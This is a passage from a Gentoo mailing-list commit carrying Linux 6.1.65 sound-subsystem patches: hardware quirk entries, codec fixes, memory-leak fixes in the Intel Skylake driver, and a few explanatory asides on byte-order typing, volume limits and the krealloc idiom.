+-	dev_dbg(dev, "  ch=%d fmt=%d/%d rate=%d\n", num_ch, vbps, bps, rate);
++	if (link_type == NHLT_LINK_DMIC && bps == 32 && (vbps == 24 || vbps == 32)) {
++		/*
++		 * The DMIC hardware supports only one type of 32 bits sample
++		 * size, which is 24 bit sampling on the MSB side and bits[1:0]
++		 * are used for indicating the channel number.
++		 * It has been observed that some NHLT tables have the vbps
++		 * specified as 32 while some uses 24.
++		 * The format these variations describe are identical, the
++		 * hardware is configured and behaves the same way.
++		 * Note: when the samples assumed to be vbps=32 then the 'noise'
++		 * introduced by the lower two bits (channel number) have no
++		 * real life implication on audio quality.
++		 */
++		dev_dbg(dev,
++			"  ch=%d fmt=%d rate=%d (vbps is ignored for DMIC 32bit format)\n",
++			num_ch, bps, rate);
++		ignore_vbps = true;
++	} else {
++		dev_dbg(dev, "  ch=%d fmt=%d/%d rate=%d\n", num_ch, vbps, bps, rate);
++	}
+ 	dev_dbg(dev, "Endpoint count=%d\n", nhlt->endpoint_count);
+ 
+ 	epnt = (struct nhlt_endpoint *)nhlt->desc;
+@@ -307,7 +331,8 @@ intel_nhlt_get_endpoint_blob(struct device *dev, struct nhlt_acpi_table *nhlt,
+ 		if (nhlt_check_ep_match(dev, epnt, bus_id, link_type, dir, dev_type)) {
+ 			fmt = (struct nhlt_fmt *)(epnt->config.caps + epnt->config.size);
+ 
+-			cfg = nhlt_get_specific_cfg(dev, fmt, num_ch, rate, vbps, bps);
++			cfg = nhlt_get_specific_cfg(dev, fmt, num_ch, rate,
++						    vbps, bps, ignore_vbps);
+ 			if (cfg)
+ 				return cfg;
+ 		}
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 1c8ffc5cf97f6..5efb3adee48d9 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7108,6 +7108,7 @@ enum {
+ 	ALC290_FIXUP_SUBWOOFER_HSJACK,
+ 	ALC269_FIXUP_THINKPAD_ACPI,
+ 	ALC269_FIXUP_DMIC_THINKPAD_ACPI,
++	ALC269VB_FIXUP_CHUWI_COREBOOK_XPRO,
+ 	ALC255_FIXUP_ACER_MIC_NO_PRESENCE,
+ 	ALC255_FIXUP_ASUS_MIC_NO_PRESENCE,
+ 	ALC255_FIXUP_DELL1_MIC_NO_PRESENCE,
+@@ -7454,6 +7455,14 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc269_fixup_pincfg_U7x7_headset_mic,
+ 	},
++	[ALC269VB_FIXUP_CHUWI_COREBOOK_XPRO] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x18, 0x03a19020 }, /* headset mic */
++			{ 0x1b, 0x90170150 }, /* speaker */
++			{ }
++		},
++	},
+ 	[ALC269_FIXUP_AMIC] = {
+ 		.type = HDA_FIXUP_PINS,
+ 		.v.pins = (const struct hda_pintbl[]) {
+@@ -9598,6 +9607,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8735, "HP ProBook 435 G7", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8736, "HP", ALC285_FIXUP_HP_GPIO_AMP_INIT),
+ 	SND_PCI_QUIRK(0x103c, 0x8760, "HP", ALC285_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x876e, "HP ENVY x360 Convertible 13-ay0xxx", ALC245_FIXUP_HP_X360_MUTE_LEDS),
+ 	SND_PCI_QUIRK(0x103c, 0x877a, "HP", ALC285_FIXUP_HP_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x877d, "HP", ALC236_FIXUP_HP_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8780, "HP ZBook Fury 17 G7 Mobile Workstation",
+@@ -9770,17 +9780,20 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1d1f, "ASUS ROG Strix G17 2023 (G713PV)", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1d42, "ASUS Zephyrus G14 2022", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1d4e, "ASUS TM420", ALC256_FIXUP_ASUS_HPE),
++	SND_PCI_QUIRK(0x1043, 0x1da2, "ASUS UP6502ZA/ZD", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402ZA", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16a3, "ASUS UX3402VA", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1f62, "ASUS UX7602ZM", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e11, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA502),
+-	SND_PCI_QUIRK(0x1043, 0x1e12, "ASUS UM3402", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x1043, 0x1e12, "ASUS UM6702RA/RC", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e51, "ASUS Zephyrus M15", ALC294_FIXUP_ASUS_GU502_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1e5e, "ASUS ROG Strix G513", ALC294_FIXUP_ASUS_G513_PINS),
+ 	SND_PCI_QUIRK(0x1043, 0x1e8e, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA401),
++	SND_PCI_QUIRK(0x1043, 0x1ee2, "ASUS UM3402", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1c52, "ASUS Zephyrus G15 2022", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1f11, "ASUS Zephyrus G14", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1f12, "ASUS UM5302", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x1043, 0x1f62, "ASUS UX7602ZM", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1f92, "ASUS ROG Flow X16", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x3030, "ASUS ZN270IE", ALC256_FIXUP_ASUS_AIO_GPIO2),
+ 	SND_PCI_QUIRK(0x1043, 0x3a20, "ASUS G614JZR", ALC245_FIXUP_CS35L41_SPI_2),
+@@ -10032,6 +10045,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1d72, 0x1901, "RedmiBook 14", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1945, "Redmi G", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1947, "RedmiBook Air", ALC255_FIXUP_XIAOMI_HEADSET_MIC),
++	SND_PCI_QUIRK(0x2782, 0x0232, "CHUWI CoreBook XPro", ALC269VB_FIXUP_CHUWI_COREBOOK_XPRO),
+ 	SND_PCI_QUIRK(0x8086, 0x2074, "Intel NUC 8", ALC233_FIXUP_INTEL_NUC8_DMIC),
+ 	SND_PCI_QUIRK(0x8086, 0x2080, "Intel NUC 8 Rugged", ALC256_FIXUP_INTEL_NUC8_RUGGED),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 1dde1f3196acc..808d002826233 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -353,6 +353,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_VERSION, "pang12"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "System76"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "pang13"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/cs43130.c b/sound/soc/codecs/cs43130.c
+index db39abb2a31b5..0b8ecd917a086 100644
+--- a/sound/soc/codecs/cs43130.c
++++ b/sound/soc/codecs/cs43130.c
+@@ -579,7 +579,7 @@ static int cs43130_set_sp_fmt(int dai_id, unsigned int bitwidth_sclk,
+ 		break;
+ 	case SND_SOC_DAIFMT_LEFT_J:
+ 		hi_size = bitwidth_sclk;
+-		frm_delay = 2;
++		frm_delay = 0;
+ 		frm_phase = 1;
+ 		break;
+ 	case SND_SOC_DAIFMT_DSP_A:
+@@ -1683,7 +1683,7 @@ static ssize_t hpload_dc_r_show(struct device *dev,
+ 	return cs43130_show_dc(dev, buf, HP_RIGHT);
+ }
+ 
+-static u16 const cs43130_ac_freq[CS43130_AC_FREQ] = {
++static const u16 cs43130_ac_freq[CS43130_AC_FREQ] = {
+ 	24,
+ 	43,
+ 	93,
+@@ -2363,7 +2363,7 @@ static const struct regmap_config cs43130_regmap = {
+ 	.use_single_write	= true,
+ };
+ 
+-static u16 const cs43130_dc_threshold[CS43130_DC_THRESHOLD] = {
++static const u16 cs43130_dc_threshold[CS43130_DC_THRESHOLD] = {
+ 	50,
+ 	120,
+ };
+diff --git a/sound/soc/codecs/da7219-aad.c b/sound/soc/codecs/da7219-aad.c
+index 9251490548e8c..c8410769188a0 100644
+--- a/sound/soc/codecs/da7219-aad.c
++++ b/sound/soc/codecs/da7219-aad.c
+@@ -663,7 +663,7 @@ static struct da7219_aad_pdata *da7219_aad_fw_to_pdata(struct device *dev)
+ 		aad_pdata->mic_det_thr =
+ 			da7219_aad_fw_mic_det_thr(dev, fw_val32);
+ 	else
+-		aad_pdata->mic_det_thr = DA7219_AAD_MIC_DET_THR_500_OHMS;
++		aad_pdata->mic_det_thr = DA7219_AAD_MIC_DET_THR_200_OHMS;
+ 
+ 	if (fwnode_property_read_u32(aad_np, "dlg,jack-ins-deb", &fw_val32) >= 0)
+ 		aad_pdata->jack_ins_deb =
+diff --git a/sound/soc/codecs/hdac_hda.c b/sound/soc/codecs/hdac_hda.c
+index 8af434e14bfba..21a00c86a1398 100644
+--- a/sound/soc/codecs/hdac_hda.c
++++ b/sound/soc/codecs/hdac_hda.c
+@@ -124,6 +124,9 @@ static struct snd_soc_dai_driver hdac_hda_dais[] = {
+ 		.sig_bits = 24,
+ 	},
+ },
++};
++
++static struct snd_soc_dai_driver hdac_hda_hdmi_dais[] = {
+ {
+ 	.id = HDAC_HDMI_0_DAI_ID,
+ 	.name = "intel-hdmi-hifi1",
+@@ -578,8 +581,16 @@ static const struct snd_soc_component_driver hdac_hda_codec = {
+ 	.endianness		= 1,
+ };
+ 
++static const struct snd_soc_component_driver hdac_hda_hdmi_codec = {
++	.probe			= hdac_hda_codec_probe,
++	.remove			= hdac_hda_codec_remove,
++	.idle_bias_on		= false,
++	.endianness		= 1,
++};
++
+ static int hdac_hda_dev_probe(struct hdac_device *hdev)
+ {
++	struct hdac_hda_priv *hda_pvt = dev_get_drvdata(&hdev->dev);
+ 	struct hdac_ext_link *hlink;
+ 	int ret;
+ 
+@@ -592,9 +603,15 @@ static int hdac_hda_dev_probe(struct hdac_device *hdev)
+ 	snd_hdac_ext_bus_link_get(hdev->bus, hlink);
+ 
+ 	/* ASoC specific initialization */
+-	ret = devm_snd_soc_register_component(&hdev->dev,
+-					 &hdac_hda_codec, hdac_hda_dais,
+-					 ARRAY_SIZE(hdac_hda_dais));
++	if (hda_pvt->need_display_power)
++		ret = devm_snd_soc_register_component(&hdev->dev,
++						&hdac_hda_hdmi_codec, hdac_hda_hdmi_dais,
++						ARRAY_SIZE(hdac_hda_hdmi_dais));
++	else
++		ret = devm_snd_soc_register_component(&hdev->dev,
++						&hdac_hda_codec, hdac_hda_dais,
++						ARRAY_SIZE(hdac_hda_dais));
++
+ 	if (ret < 0) {
+ 		dev_err(&hdev->dev, "failed to register HDA codec %d\n", ret);
+ 		return ret;
+diff --git a/sound/soc/codecs/nau8822.c b/sound/soc/codecs/nau8822.c
+index 1aef281a99727..cd5053cfd5213 100644
+--- a/sound/soc/codecs/nau8822.c
++++ b/sound/soc/codecs/nau8822.c
+@@ -184,6 +184,7 @@ static int nau8822_eq_get(struct snd_kcontrol *kcontrol,
+ 	struct soc_bytes_ext *params = (void *)kcontrol->private_value;
+ 	int i, reg;
+ 	u16 reg_val, *val;
++	__be16 tmp;
+ 
+ 	val = (u16 *)ucontrol->value.bytes.data;
+ 	reg = NAU8822_REG_EQ1;
+@@ -192,8 +193,8 @@ static int nau8822_eq_get(struct snd_kcontrol *kcontrol,
+ 		/* conversion of 16-bit integers between native CPU format
+ 		 * and big endian format
+ 		 */
+-		reg_val = cpu_to_be16(reg_val);
+-		memcpy(val + i, &reg_val, sizeof(reg_val));
++		tmp = cpu_to_be16(reg_val);
++		memcpy(val + i, &tmp, sizeof(tmp));
+ 	}
+ 
+ 	return 0;
+@@ -216,6 +217,7 @@ static int nau8822_eq_put(struct snd_kcontrol *kcontrol,
+ 	void *data;
+ 	u16 *val, value;
+ 	int i, reg, ret;
++	__be16 *tmp;
+ 
+ 	data = kmemdup(ucontrol->value.bytes.data,
+ 		params->max, GFP_KERNEL | GFP_DMA);
+@@ -228,7 +230,8 @@ static int nau8822_eq_put(struct snd_kcontrol *kcontrol,
+ 		/* conversion of 16-bit integers between native CPU format
+ 		 * and big endian format
+ 		 */
+-		value = be16_to_cpu(*(val + i));
++		tmp = (__be16 *)(val + i);
++		value = be16_to_cpup(tmp);
+ 		ret = snd_soc_component_write(component, reg + i, value);
+ 		if (ret) {
+ 			dev_err(component->dev,
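
The nau8822 change is mainly a type-annotation fix: cpu_to_be16() returns a __be16, and storing it in a plain u16 (or reading big-endian bytes back through a u16 *) trips sparse and obscures which byte order a variable actually holds. The clean idiom keeps swapped values in __be16 temporaries and moves them with memcpy, e.g. (hypothetical helpers):

	#include <linux/types.h>
	#include <linux/string.h>
	#include <asm/byteorder.h>

	/* Keep byte-swapped values in __be16 variables so the types say
	 * which byte order the bytes are in. */
	static void put_be16(void *dst, u16 val)
	{
		__be16 tmp = cpu_to_be16(val);

		memcpy(dst, &tmp, sizeof(tmp));
	}

	static u16 get_be16(const void *src)
	{
		__be16 tmp;

		memcpy(&tmp, src, sizeof(tmp));
		return be16_to_cpu(tmp);
	}
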
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index f86fc7cd104d4..60518ee5a86e7 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -448,6 +448,7 @@ struct rt5645_priv {
+ 	struct regulator_bulk_data supplies[ARRAY_SIZE(rt5645_supply_names)];
+ 	struct rt5645_eq_param_s *eq_param;
+ 	struct timer_list btn_check_timer;
++	struct mutex jd_mutex;
+ 
+ 	int codec_type;
+ 	int sysclk;
+@@ -3189,6 +3190,8 @@ static int rt5645_jack_detect(struct snd_soc_component *component, int jack_inse
+ 				rt5645_enable_push_button_irq(component, true);
+ 			}
+ 		} else {
++			if (rt5645->en_button_func)
++				rt5645_enable_push_button_irq(component, false);
+ 			snd_soc_dapm_disable_pin(dapm, "Mic Det Power");
+ 			snd_soc_dapm_sync(dapm);
+ 			rt5645->jack_type = SND_JACK_HEADPHONE;
+@@ -3269,6 +3272,8 @@ static void rt5645_jack_detect_work(struct work_struct *work)
+ 	if (!rt5645->component)
+ 		return;
+ 
++	mutex_lock(&rt5645->jd_mutex);
++
+ 	switch (rt5645->pdata.jd_mode) {
+ 	case 0: /* Not using rt5645 JD */
+ 		if (rt5645->gpiod_hp_det) {
+@@ -3295,7 +3300,7 @@ static void rt5645_jack_detect_work(struct work_struct *work)
+ 
+ 	if (!val && (rt5645->jack_type == 0)) { /* jack in */
+ 		report = rt5645_jack_detect(rt5645->component, 1);
+-	} else if (!val && rt5645->jack_type != 0) {
++	} else if (!val && rt5645->jack_type == SND_JACK_HEADSET) {
+ 		/* for push button and jack out */
+ 		btn_type = 0;
+ 		if (snd_soc_component_read(rt5645->component, RT5645_INT_IRQ_ST) & 0x4) {
+@@ -3351,6 +3356,8 @@ static void rt5645_jack_detect_work(struct work_struct *work)
+ 		rt5645_jack_detect(rt5645->component, 0);
+ 	}
+ 
++	mutex_unlock(&rt5645->jd_mutex);
++
+ 	snd_soc_jack_report(rt5645->hp_jack, report, SND_JACK_HEADPHONE);
+ 	snd_soc_jack_report(rt5645->mic_jack, report, SND_JACK_MICROPHONE);
+ 	if (rt5645->en_button_func)
+@@ -4119,6 +4126,7 @@ static int rt5645_i2c_probe(struct i2c_client *i2c)
+ 	}
+ 	timer_setup(&rt5645->btn_check_timer, rt5645_btn_check_callback, 0);
+ 
++	mutex_init(&rt5645->jd_mutex);
+ 	INIT_DELAYED_WORK(&rt5645->jack_detect_work, rt5645_jack_detect_work);
+ 	INIT_DELAYED_WORK(&rt5645->rcclock_work, rt5645_rcclock_work);
+ 
+diff --git a/sound/soc/codecs/wm8974.c b/sound/soc/codecs/wm8974.c
+index 010a394c705c1..1becbf2c6ffad 100644
+--- a/sound/soc/codecs/wm8974.c
++++ b/sound/soc/codecs/wm8974.c
+@@ -186,7 +186,7 @@ SOC_DAPM_SINGLE("PCM Playback Switch", WM8974_MONOMIX, 0, 1, 0),
+ 
+ /* Boost mixer */
+ static const struct snd_kcontrol_new wm8974_boost_mixer[] = {
+-SOC_DAPM_SINGLE("Aux Switch", WM8974_INPPGA, 6, 1, 1),
++SOC_DAPM_SINGLE("PGA Switch", WM8974_INPPGA, 6, 1, 1),
+ };
+ 
+ /* Input PGA */
+@@ -246,8 +246,8 @@ static const struct snd_soc_dapm_route wm8974_dapm_routes[] = {
+ 
+ 	/* Boost Mixer */
+ 	{"ADC", NULL, "Boost Mixer"},
+-	{"Boost Mixer", "Aux Switch", "Aux Input"},
+-	{"Boost Mixer", NULL, "Input PGA"},
++	{"Boost Mixer", NULL, "Aux Input"},
++	{"Boost Mixer", "PGA Switch", "Input PGA"},
+ 	{"Boost Mixer", NULL, "MICP"},
+ 
+ 	/* Input PGA */
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index 783c201259921..797d0a48d6066 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -83,6 +83,7 @@ enum {
+ #define BYT_RT5640_HSMIC2_ON_IN1	BIT(27)
+ #define BYT_RT5640_JD_HP_ELITEP_1000G2	BIT(28)
+ #define BYT_RT5640_USE_AMCR0F28		BIT(29)
++#define BYT_RT5640_SWAPPED_SPEAKERS	BIT(30)
+ 
+ #define BYTCR_INPUT_DEFAULTS				\
+ 	(BYT_RT5640_IN3_MAP |				\
+@@ -157,6 +158,8 @@ static void log_quirks(struct device *dev)
+ 		dev_info(dev, "quirk MONO_SPEAKER enabled\n");
+ 	if (byt_rt5640_quirk & BYT_RT5640_NO_SPEAKERS)
+ 		dev_info(dev, "quirk NO_SPEAKERS enabled\n");
++	if (byt_rt5640_quirk & BYT_RT5640_SWAPPED_SPEAKERS)
++		dev_info(dev, "quirk SWAPPED_SPEAKERS enabled\n");
+ 	if (byt_rt5640_quirk & BYT_RT5640_LINEOUT)
+ 		dev_info(dev, "quirk LINEOUT enabled\n");
+ 	if (byt_rt5640_quirk & BYT_RT5640_LINEOUT_AS_HP2)
+@@ -884,6 +887,19 @@ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
+ 					BYT_RT5640_SSP0_AIF1 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
++	{
++		/* Medion Lifetab S10346 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "AMI Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "Aptio CRB"),
++			/* Above strings are much too generic, also match on BIOS date */
++			DMI_MATCH(DMI_BIOS_DATE, "10/22/2015"),
++		},
++		.driver_data = (void *)(BYTCR_INPUT_DEFAULTS |
++					BYT_RT5640_SWAPPED_SPEAKERS |
++					BYT_RT5640_SSP0_AIF1 |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{	/* Mele PCG03 Mini PC */
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_BOARD_VENDOR, "Mini PC"),
+@@ -1609,11 +1625,11 @@ static int snd_byt_rt5640_mc_probe(struct platform_device *pdev)
+ 	const char *platform_name;
+ 	struct acpi_device *adev;
+ 	struct device *codec_dev;
++	const char *cfg_spk;
+ 	bool sof_parent;
+ 	int ret_val = 0;
+ 	int dai_index = 0;
+-	int i, cfg_spk;
+-	int aif;
++	int i, aif;
+ 
+ 	is_bytcr = false;
+ 	priv = devm_kzalloc(dev, sizeof(*priv), GFP_KERNEL);
+@@ -1773,13 +1789,16 @@ static int snd_byt_rt5640_mc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	if (byt_rt5640_quirk & BYT_RT5640_NO_SPEAKERS) {
+-		cfg_spk = 0;
++		cfg_spk = "0";
+ 		spk_type = "none";
+ 	} else if (byt_rt5640_quirk & BYT_RT5640_MONO_SPEAKER) {
+-		cfg_spk = 1;
++		cfg_spk = "1";
+ 		spk_type = "mono";
++	} else if (byt_rt5640_quirk & BYT_RT5640_SWAPPED_SPEAKERS) {
++		cfg_spk = "swapped";
++		spk_type = "swapped";
+ 	} else {
+-		cfg_spk = 2;
++		cfg_spk = "2";
+ 		spk_type = "stereo";
+ 	}
+ 
+@@ -1794,7 +1813,7 @@ static int snd_byt_rt5640_mc_probe(struct platform_device *pdev)
+ 		headset2_string = " cfg-hs2:in1";
+ 
+ 	snprintf(byt_rt5640_components, sizeof(byt_rt5640_components),
+-		 "cfg-spk:%d cfg-mic:%s aif:%d%s%s", cfg_spk,
++		 "cfg-spk:%s cfg-mic:%s aif:%d%s%s", cfg_spk,
+ 		 map_name[BYT_RT5640_MAP(byt_rt5640_quirk)], aif,
+ 		 lineout_string, headset2_string);
+ 	byt_rt5640_card.components = byt_rt5640_components;
+diff --git a/sound/soc/intel/boards/skl_hda_dsp_generic.c b/sound/soc/intel/boards/skl_hda_dsp_generic.c
+index 879ebba528322..463ffb85121d3 100644
+--- a/sound/soc/intel/boards/skl_hda_dsp_generic.c
++++ b/sound/soc/intel/boards/skl_hda_dsp_generic.c
+@@ -157,6 +157,8 @@ static int skl_hda_fill_card_info(struct snd_soc_acpi_mach_params *mach_params)
+ 		card->dapm_widgets = skl_hda_widgets;
+ 		card->num_dapm_widgets = ARRAY_SIZE(skl_hda_widgets);
+ 		if (!ctx->idisp_codec) {
++			card->dapm_routes = &skl_hda_map[IDISP_ROUTE_COUNT];
++			num_route -= IDISP_ROUTE_COUNT;
+ 			for (i = 0; i < IDISP_DAI_COUNT; i++) {
+ 				skl_hda_be_dai_links[i].codecs = dummy_codec;
+ 				skl_hda_be_dai_links[i].num_codecs =
+diff --git a/sound/soc/intel/skylake/skl-pcm.c b/sound/soc/intel/skylake/skl-pcm.c
+index 1015716f93361..adee4be2dea71 100644
+--- a/sound/soc/intel/skylake/skl-pcm.c
++++ b/sound/soc/intel/skylake/skl-pcm.c
+@@ -251,8 +251,10 @@ static int skl_pcm_open(struct snd_pcm_substream *substream,
+ 	snd_pcm_set_sync(substream);
+ 
+ 	mconfig = skl_tplg_fe_get_cpr_module(dai, substream->stream);
+-	if (!mconfig)
++	if (!mconfig) {
++		kfree(dma_params);
+ 		return -EINVAL;
++	}
+ 
+ 	skl_tplg_d0i3_get(skl, mconfig->d0i3_caps);
+ 
+@@ -1471,6 +1473,7 @@ int skl_platform_register(struct device *dev)
+ 		dais = krealloc(skl->dais, sizeof(skl_fe_dai) +
+ 				sizeof(skl_platform_dai), GFP_KERNEL);
+ 		if (!dais) {
++			kfree(skl->dais);
+ 			ret = -ENOMEM;
+ 			goto err;
+ 		}
+@@ -1483,8 +1486,10 @@ int skl_platform_register(struct device *dev)
+ 
+ 	ret = devm_snd_soc_register_component(dev, &skl_component,
+ 					 skl->dais, num_dais);
+-	if (ret)
++	if (ret) {
++		kfree(skl->dais);
+ 		dev_err(dev, "soc component registration failed %d\n", ret);
++	}
+ err:
+ 	return ret;
+ }
+diff --git a/sound/soc/intel/skylake/skl-sst-ipc.c b/sound/soc/intel/skylake/skl-sst-ipc.c
+index 7a425271b08b1..fd9624ad5f72b 100644
+--- a/sound/soc/intel/skylake/skl-sst-ipc.c
++++ b/sound/soc/intel/skylake/skl-sst-ipc.c
+@@ -1003,8 +1003,10 @@ int skl_ipc_get_large_config(struct sst_generic_ipc *ipc,
+ 
+ 	reply.size = (reply.header >> 32) & IPC_DATA_OFFSET_SZ_MASK;
+ 	buf = krealloc(reply.data, reply.size, GFP_KERNEL);
+-	if (!buf)
++	if (!buf) {
++		kfree(reply.data);
+ 		return -ENOMEM;
++	}
+ 	*payload = buf;
+ 	*bytes = reply.size;
+ 
+diff --git a/sound/soc/soc-ops.c b/sound/soc/soc-ops.c
+index 55b009d3c6815..2d25748ca7066 100644
+--- a/sound/soc/soc-ops.c
++++ b/sound/soc/soc-ops.c
+@@ -661,7 +661,7 @@ int snd_soc_limit_volume(struct snd_soc_card *card,
+ 	kctl = snd_soc_card_get_kcontrol(card, name);
+ 	if (kctl) {
+ 		struct soc_mixer_control *mc = (struct soc_mixer_control *)kctl->private_value;
+-		if (max <= mc->max) {
++		if (max <= mc->max - mc->min) {
+ 			mc->platform_max = max;
+ 			ret = 0;
+ 		}
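
The soc-ops fix is about coordinate systems: userspace sees mixer values shifted to start at 0, i.e. running from 0 to mc->max - mc->min, while mc->max alone is the raw register limit. A cap supplied in the user-visible scale must therefore be compared against the span. A worked example with hypothetical numbers: a gain control encoded with min = -127 and max = 0 exposes user values 0..127, so a requested limit of 100 is valid even though it exceeds mc->max:

	/* User-visible range is 0 .. (max - min); a platform cap expressed
	 * in that range must be tested against the span, not the raw max. */
	static int cap_is_valid(int cap, int min, int max)
	{
		return cap <= max - min;
	}
	/* cap_is_valid(100, -127, 0) == 1; the old "cap <= max" rejected it. */
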
+diff --git a/sound/soc/sof/intel/hda-codec.c b/sound/soc/sof/intel/hda-codec.c
+index f2ec2a6c2e0f3..a0dfd7de431fe 100644
+--- a/sound/soc/sof/intel/hda-codec.c
++++ b/sound/soc/sof/intel/hda-codec.c
+@@ -54,8 +54,16 @@ static int request_codec_module(struct hda_codec *codec)
+ 
+ static int hda_codec_load_module(struct hda_codec *codec)
+ {
+-	int ret = request_codec_module(codec);
++	int ret;
++
++	ret = snd_hdac_device_register(&codec->core);
++	if (ret) {
++		dev_err(&codec->core.dev, "failed to register hdac device\n");
++		put_device(&codec->core.dev);
++		return ret;
++	}
+ 
++	ret = request_codec_module(codec);
+ 	if (ret <= 0) {
+ 		codec->probe_id = HDA_CODEC_ID_GENERIC;
+ 		ret = request_codec_module(codec);
+@@ -112,7 +120,6 @@ EXPORT_SYMBOL_NS(hda_codec_jack_check, SND_SOC_SOF_HDA_AUDIO_CODEC);
+ static struct hda_codec *hda_codec_device_init(struct hdac_bus *bus, int addr, int type)
+ {
+ 	struct hda_codec *codec;
+-	int ret;
+ 
+ 	codec = snd_hda_codec_device_init(to_hda_bus(bus), addr, "ehdaudio%dD%d", bus->idx, addr);
+ 	if (IS_ERR(codec)) {
+@@ -122,13 +129,6 @@ static struct hda_codec *hda_codec_device_init(struct hdac_bus *bus, int addr, i
+ 
+ 	codec->core.type = type;
+ 
+-	ret = snd_hdac_device_register(&codec->core);
+-	if (ret) {
+-		dev_err(bus->dev, "failed to register hdac device\n");
+-		put_device(&codec->core.dev);
+-		return ERR_PTR(ret);
+-	}
+-
+ 	return codec;
+ }
+ 
+diff --git a/tools/testing/selftests/alsa/mixer-test.c b/tools/testing/selftests/alsa/mixer-test.c
+index a38b89c280306..37da902545a41 100644
+--- a/tools/testing/selftests/alsa/mixer-test.c
++++ b/tools/testing/selftests/alsa/mixer-test.c
+@@ -177,7 +177,7 @@ static void find_controls(void)
+ 			err = snd_ctl_elem_info(card_data->handle,
+ 						ctl_data->info);
+ 			if (err < 0) {
+-				ksft_print_msg("%s getting info for %d\n",
++				ksft_print_msg("%s getting info for %s\n",
+ 					       snd_strerror(err),
+ 					       ctl_data->name);
+ 			}


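[Editorial note, not part of the patch above] Two of the hunks in 1064_linux-6.1.65.patch (skl-pcm.c and skl-sst-ipc.c) fix the same bug class: krealloc() returns NULL on failure but leaves the original allocation alive, so storing its result over the only remaining pointer leaks that buffer. A minimal userspace sketch of the safe idiom, using realloc(), which has the same failure semantics as krealloc():

#include <stdlib.h>

/* Grow 'buf' to 'new_size' bytes without leaking it on failure.
 * realloc(), like the kernel's krealloc(), returns NULL on failure
 * and leaves the original allocation untouched, so the caller must
 * keep a second pointer to free it. */
static void *grow_or_free(void *buf, size_t new_size)
{
	void *tmp = realloc(buf, new_size);

	if (!tmp)
		free(buf);	/* writing realloc() straight into 'buf' would leak it */
	return tmp;
}
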
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-15 18:47 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-15 18:47 UTC (permalink / raw
  To: gentoo-commits

commit:     148d2179613dff642ecf5cb7253eee922ab3cb1e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
